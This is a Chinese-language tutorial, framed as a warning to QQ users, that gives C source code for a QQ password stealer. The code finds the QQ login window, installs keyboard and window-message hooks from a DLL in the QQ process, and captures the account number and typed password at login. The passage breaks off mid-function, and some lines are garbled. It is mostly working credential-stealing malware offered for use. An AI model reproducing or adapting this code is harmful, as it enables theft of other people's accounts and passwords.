網名館QQ用户小心了! C語言實現QQ密碼大盜
(1)尋找QQ登陸界面。
(2)安裝鈎子
(3)鈎子函數的解釋.
(4)處理密碼。
以下部分全是使用C語言,文章中我假設讀者您是會C/SDK編程的。如果遇到相關的概念性問題,您可以查看MSDN或是上BBS 詢問!
尋找QQ登陸界面
軟件運行後,利用安裝定時器,每秒在系統找QQ登陸界面,這樣基本上只要用户打開了QQ登陸界面就會被抓住其句柄,看下面代碼:
#define ID_MYTIMER 555
SetTimer(hDlg, ID_MYTIMER, 1000, NULL);
安裝好TIMER後,下面是處理主程序的WM_TIMER消息,凡是出現沒有定義的變量,您可以理解為是全局變量.
//處理WM_TIMER代碼
if (!IsWindow(g_hQQLogin)) //判斷g_hQQLogin是否是有效的窗口句柄
{
HWND hLogin=NULL;
g_hQQLogin = NULL;
SetQQHook(NULL); //參數為NULL是卸載HOOK,參數為句柄是安裝句柄
do
{
//利用FindWindowEx查找QQ登陸窗口,具體參數意思請查MSDN
g_hQQLogin=FindWindowEx(NULL,g_hQQLogin,"#32770",NULL); //對話框的類都是#32770
//找到類名是#32770後,再在其窗體內找一個具有“ 登錄QQ”的BUTTON按紐
hLogin = FindWindowEx(g_hQQLogin, NULL, "Button", " 登錄QQ"); //這一句很關鍵,如果你的QQ登陸窗口上沒有" 登錄QQ"字樣,那麼獲取密碼將失敗!
}
while(g_hQQLogin != NULL && hLogin == NULL); //直到找到指定的窗口,即:QQ登陸窗口
if (g_hQQLogin != NULL)
{
SetQQHook(g_hQQLogin);//安裝HOOK,此函數在DLL文件中 第二部分中介紹
}
}
上面就是查找QQ登陸窗口句柄的過程,從代碼可以看出我用的方法:找一個其子窗體中有一個標題為“ 登錄QQ”的BUTTON的對話框(這句話説得有點饒口,這句話如果也看不懂,下面您不用看了:() 我最開始是想利用 FindWindow(NULL,"QQ用户登陸窗口")來查找,但是我用Spy++看了QQ登陸窗口的標題並不是“QQ用户登陸窗口”,而是“亂碼”,其中包含了回車鍵等特殊字符,於是我用了FindWindowEx().
安裝鈎子
找到了QQ登陸窗口後,就成功了一半。
下面是DLL文件中的安裝HOOK的函數SetQQHook(), 為什麼要用DLL(動態連接庫)?要去“鈎”其他進程的消息,得讓HOOK函數在DLL中,這樣好映射到其地址空間中!
BOOL WINAPI SetQQHook(HWND hQQLogin)
{
//獲得登陸框的句柄
BOOL bRet = FALSE;
if (hQQLogin != NULL)
{
DWORD dwThreadID = GetWindowThreadProcessId(hQQLogin, NULL); //這是什麼意思?看MSDN
g_hNum = GetDlgItem(hQQLogin, 138);//不同版本QQ,此處不一樣! 得到QQ號的子窗口句柄
g_hPsw = GetDlgItem(hQQLogin, 180); //不同版本QQ,此處不一樣!得到QQ密碼的子窗口句柄
if (g_hNum == NULL)
{
MessageBox(NULL,"哭了,號碼句柄都沒有得到!","鬱悶",0);
return FALSE;
}
if(g_hPsw==NULL)
{
MessageBox(NULL,"哭了,密碼句柄都沒有得到!","鬱悶",0);
return FALSE;
}
分別鍵盤HOOK,和界面部分消息處理的HOOK
g_hProc = SetWindowsHookEx(WH_CALLWNDPROC, CallWndProc, g_hInstDLL, dwThreadID);
g_hKey = SetWindowsHookEx(WH_KEYBOARD, KeyboardProc, g_hInstDLL, dwThreadID);
bRet = (g_hProc != NULL) && (g_hKey != NULL);
}
else
{
// 卸載鈎子
bRet = UnhookWindowsHookEx(g_hProc) && UnhookWindowsHookEx(g_hKey);
g_hProc = NULL;
g_hKey = NULL;
g_hNum = NULL;
}
return bRet;
}
上面是安裝HOOK部分的代碼,就這麼簡單,上面提到了CallWndProc,KeyboardProc是兩個回調函數,是我第三部分要解釋的鈎子函數
鈎子函數的解釋
CallWndProc,KeyboardProc是兩個回調函數的原型和具體代碼如下:
// 鈎子過程,監視“登陸”的命令消息
LRESULT CALLBACK CallWndProc(int nCode, WPARAM wParam, LPARAM lParam)
{
CWPSTRUCT *p = (CWPSTRUCT *)lParam;
// 捕獲“登陸”按鈕
if (p->message == WM_COMMAND && p->wParam ==16032)
//下面個函數是我在第四部分介紹-“處理密碼”部分會仔細説明
//當用户點了登陸按鈕,説明QQ號碼和QQ密碼已經填寫完畢,當然可以去獲得密碼了
GetPasswrod();
return CallNextHookEx(g_hProc, nCode, wParam, lParam);
}
// 鍵盤鈎子過程,監視“登陸”的熱鍵消息
LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam)
{
// 捕獲熱鍵消息,記錄鍵盤的按鍵盤過程,pmsg是PMSG類型的,i是全局Static類型的
pmsg[i]am =wParam;
i++;
if (wParam == VK_RETURN) //用户使用鍵盤“回車”來登陸,用户用了回車後,就可以可以去獲得密碼了
GetPasswrod();
return CallNextHookEx(g_hKey, nCode, wParam, lParam);
}
在明白了這兩個鈎子函數後就可以看後期是如何具體處理密碼的了,這就是下面的第四部分內容
處理密碼
如果您讀到了此處,我想得暫停一會,先讓我來幫你回憶一下前面提到的幾個關鍵的變量
第一個:QQ號的子窗口句柄 g_hNum
第二個:QQ密碼的子窗口句柄 g_hPsw //此部分暫時不使用,下面
第三個:存鍵盤按鍵的 pmsg
上面三變量分別出現在第二部分和第三部分,都是全局共享(shared)變量
QQ密碼的子窗口句柄 g_hPsw 此部分暫時不使用,你可以看到下面代碼中有句用到g_hPsw的語句是我註釋掉了的,原因是無法通過那樣去得到QQ密碼,得處理按鍵消息
void GetPasswrod()
{
//聲明變量和初始化
HANDLE f;
TCHAR num[13];
TCHAR psw[21];
TCHAR total[50];
int j;
memset(num,0,sizeof(num));
memset(total,0,sizeof(total));
memset(psw,0,sizeof(psw));
DWORD dw;
//得到QQ號的內容,以為有的人的QQ號是在登陸框有記錄,其QQ號並是用鍵盤輸入的
GetWindowText(g_hNum,(LPSTR)num,sizeof(num));
//GetWindowText(g_hPsw,(LPSTR)psw,sizeof(psw)); //此句不使用,無法這樣獲得密碼
//提取出鍵盤記錄,此內容也許全是密碼,也許是QQ號+QQ密碼
for(j=0;j<20;j++)
{
psw[j]=(TCHAR)pmsg[j*2]am ;
}
psw[j+1]=’